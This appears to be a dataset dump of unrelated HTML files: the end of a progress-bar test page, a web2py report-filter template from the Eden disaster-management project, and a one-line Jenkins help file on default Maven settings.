<progress min=0 value=30 max=100 style="-webkit-writing-mode: horizontal-tb;"></progress>
<progress min=0 value=30 max=100 style="-webkit-writing-mode: horizontal-bt;"></progress>
</body>
</html>
|
views/vulnerability/report.html
|
tudorian/eden
|
<section id='reportsSection'>
<section id='reportFilters'>
<h3>{{=T("Location")}}</h3>
<section class='locationFilters'>
<span id='l0_report'>
<label for='l0_reports'>{{=COUNTRY}}:</label>
<select id='l0_reports'>
<option value='' class='none'>{{=CHOOSE_COUNTRY}}</option>
</select>
</span>
<span id='l1_report'>
<label for='l1_reports'></label>
<select id='l1_reports'></select>
</span>
<span id='l2_report'>
<label for='l2_reports'></label>
<select id='l2_reports'></select>
</span>
<span id='l3_report'>
<label for='l3_reports'></label>
<select id='l3_reports'></select>
</span>
<!--
<span id='l4_report'>
<label for='l4_reports'></label>
<select id='l4_reports'></select>
<span id='l5_report'>
<label for='l5_reports'></label>
<select id='l5_reports'></select>
</span>-->
<span id='lx_report_throbber' class='throbber hidden'></span>
</section>
<h3>{{=T("Date Range")}}</h3>
<section class='dateFilters'>
<label for='dateFromReports'>{{=T("FROM")}}</label>
<input id='dateFromReports' />
<label for='dateToReports'>{{=T("TO")}}</label>
<input id='dateToReports' />
</section>
<h3>{{=T("Type")}}</h3>
<section class='typeFilters'>
<div>
<input id='indicatorsCheckbox' type='checkbox' value='indicators' checked />
<label for='indicatorsCheckbox'>{{=T("Indicators")}}</label>
</div>
<div>
<input id='mapCheckbox' type='checkbox' value='map' checked />
<label for='mapCheckbox'>{{=T("Map")}}</label>
</div>
<div><input id='imagesCheckbox' type='checkbox' value='images' checked />
<label for='imagesCheckbox'>{{=T("Images")}}</label>
</div>
<div>
<input id='reportsCheckbox' type='checkbox' value='reports' checked />
<label for='reportsCheckbox'>{{=T("Other reports")}}</label>
</div>
<div>
<input id='demographicsCheckbox' type='checkbox' value='demographics' checked />
<label for='demographicsCheckbox'>{{=T("Demographic Data")}}</label>
</div>
</section>
<div id='filterSubmit' class='filter'>{{=T("Filter")}}</div>
</section>
<section id='reportsContent'>
<div id='numberReports'></div>
<div id='table-container'>
{{#=s3.report}}
</div>
<div class='approvalScreen'>
<p class='thanks'>{{=T("Thank you for your approval")}}.</p>
<p class='return2reports'><a href='#reports'>{{=T("Back to the main screen")}}</a></p>
</div>
</section>
<section id='reportsHeader'>
<h2>{{=T("REPORTS")}}</h2>
<div id='reportsToggle'>
<div class='allReports active'>{{=T("ALL REPORTS")}}</div>
<div>|</div>
<div class='myReports'><a href="javascript:toggleReports('myReports')" title='My Reports'>{{=T("MY REPORTS")}}</a></div>
</div>
<div class='panelSearch'>
<input id='reportTextSearch' class='rounded' type='text' name='reportsSearch' />
<div class='panelSearchSubmit'></div>
</div>
<div class='closePanel'></div>
</section>
</section>
|
core/src/main/resources/jenkins/mvn/DefaultSettingsProvider/help.html
|
github-api-test-org/jenkins
|
<div>
Use default maven settings (<tt>$HOME/.m2/settings.xml</tt>) as set on build node.
</div>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.